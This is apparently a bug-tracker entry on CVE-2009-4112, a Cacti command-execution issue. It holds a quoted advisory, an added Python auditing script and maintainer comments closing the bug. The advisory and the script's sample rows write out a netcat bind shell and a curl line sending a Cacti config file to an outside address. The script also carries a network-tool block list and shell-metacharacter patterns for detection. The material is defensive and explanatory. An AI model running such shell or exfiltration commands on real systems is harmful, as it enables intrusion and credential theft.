Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4112 to the following vulnerability:

Cacti 0.8.7e and earlier allows remote authenticated administrators to gain privileges by modifying the "Data Input Method" for the "Linux - Get Memory Usage" setting to contain arbitrary commands.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4112
http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0292.html
http://www.securityfocus.com/bid/37137

More issue details from the full-disclosure post by Moritz Naumann:
-------------------------------------------------------------------
5. Privilege escalation

Finally, due to the permissive way the web interface allows Cacti to be configured, a cacti administrator is also able to execute arbitrary commands on the system as the user the Cacti polling mechanism runs as (usually a non-privileged user). For example, it is possible to successfully spawn (and connect to) a backdoor/remote shell on the Cacti system by changing the "Data Input Method" for "Linux - Get Memory Usage". Setting "Input String" to

  nohup nc -l -p 6666 -n -e /bin/sh &

would spawn a remotely accessible shell whenever this handler was called (every couple of minutes by default on my Debian test system).

Cacti developers say:
> There is no effective way to fix the data input method without
> breaking Cacti. It will be reviewed for the release of 0.8.8.

Upstream patch:
---------------
No upstream patch yet.
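Since the advisory turns on an administrator replacing a stock "Input String" with a shell command that the poller then runs on every cycle, the practical control is to audit the configured data input methods rather than to patch Cacti. The script below is an added example, not code from the bug report, from the advisory or from the Cacti project. It takes rows shaped like Cacti's data_input table (the column names, the stock input strings and the <path_cacti>/scripts/ convention are assumptions made for this example) and flags any input string whose program is not a script under <path_cacti>/scripts/, that invokes a network tool such as nc or curl, or that contains shell metacharacters (pipes, backgrounding, redirection, command substitution). The modified "Linux - Get Memory Usage" method from the advisory is included as a constructed row.

```python
import re

# Layout of Cacti's data input methods as assumed here: interpreter plus a
# script shipped under <path_cacti>/scripts/, followed by <placeholder> fields
# that the poller fills in per host. Both conventions are assumptions for this
# example, not facts taken from the bug report.
SCRIPTS_DIR = "<path_cacti>/scripts/"
INTERPRETERS = {"perl", "php", "python", "python3", "sh", "bash"}
REMOTE_TOOLS = {"nc", "ncat", "netcat", "socat", "telnet", "curl", "wget", "ssh"}

_PLACEHOLDER = re.compile(r"<[A-Za-z0-9_]+>")
# Pipes, backgrounding, backticks, $(...) / ${...}, bash's /dev/tcp pseudo-device,
# and redirection. Angle brackets are only checked after placeholders are removed.
_META = re.compile(r"[;&|`]|\$\(|\$\{|/dev/tcp/|[<>]")

# Constructed sample rows (id, name, input_string); not real Cacti data.
SAMPLE_DATA_INPUT = [
    (1, "Get SNMP Data", ""),                       # SNMP method: no command
    (2, "Unix - Get Load Average", "perl <path_cacti>/scripts/loadavg_multi.pl"),
    (3, "Linux - Get Memory Usage", "perl <path_cacti>/scripts/linux_memory.pl <grepstr>"),
    # The modification described in the advisory: a listening shell spawned
    # every polling interval as the cacti user.
    (4, "Linux - Get Memory Usage", "nohup nc -l -p 6666 -n -e /bin/sh &"),
    # A quieter variant: exfiltrate a file instead of opening a listener.
    (5, "Custom - Cat Config", "cat /etc/cacti/debian.php | curl -d @- http://203.0.113.10/"),
]


def audit_input_string(input_string):
    """Return a list of reasons the input string looks like an injected command.

    An empty list means the string matches the stock layout (or is empty,
    as for SNMP methods).
    """
    reasons = []
    s = input_string.strip()
    if not s:
        return reasons
    tokens = s.split()
    prog = tokens[0].rsplit("/", 1)[-1]

    if prog in INTERPRETERS:
        # An interpreter is fine only when it runs a script from the scripts dir;
        # "perl -e ..." or "bash -c ..." would fail this check.
        target = tokens[1] if len(tokens) > 1 else ""
        if not target.startswith(SCRIPTS_DIR):
            reasons.append(f"interpreter {prog!r} runs {target!r}, not a script under {SCRIPTS_DIR}")
    elif prog in REMOTE_TOOLS:
        reasons.append(f"network tool {prog!r} invoked as program")
    elif not tokens[0].startswith(SCRIPTS_DIR):
        reasons.append(f"program {tokens[0]!r} outside {SCRIPTS_DIR}")

    # Blank the legitimate <placeholder> tokens before looking for metacharacters.
    stripped = _PLACEHOLDER.sub("", s)
    meta = sorted(set(_META.findall(stripped)))
    if meta:
        reasons.append("shell metacharacters: " + " ".join(meta))

    # nohup/timeout/env wrappers can push the real tool into the arguments.
    for token in tokens[1:]:
        if token.rsplit("/", 1)[-1] in REMOTE_TOOLS:
            reasons.append(f"network tool {token!r} in arguments")
    return reasons


def audit_data_input(rows):
    """Return (id, name, reasons) for every row whose input string is suspicious."""
    findings = []
    for row_id, name, input_string in rows:
        reasons = audit_input_string(input_string)
        if reasons:
            findings.append((row_id, name, reasons))
    return findings


if __name__ == "__main__":
    for row_id, name, reasons in audit_data_input(SAMPLE_DATA_INPUT):
        print(f"data_input id={row_id} ({name}):")
        for reason in reasons:
            print(f"  - {reason}")
```

In a real deployment the rows would come from `SELECT id, name, input_string FROM data_input` against the Cacti database, run from cron and diffed against the previous output, so that an administrator editing a stock method shows up within one polling interval of the change rather than after the shell has been listening for weeks. The check is deliberately conservative: a legitimate custom method that wraps its script in a pipeline will be flagged too, which is the right default for something that executes as the poller user.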
What version of nc has a valid -e?
(In reply to comment #1)
> what version of nc has a valid -e?

Some Debian version, or nmap's netcat implementation, ncat.

However, I'm closing this bug. It is expected that a cacti administrator is able to define new Data Input Methods that can be either an SNMP query or a command that is run with the privileges of the cacti user. So this "flaw" does not bypass any intended restriction. It seems upstream has no intention to add additional restrictions on Data Input Method commands in the maintenance releases for the current cacti version.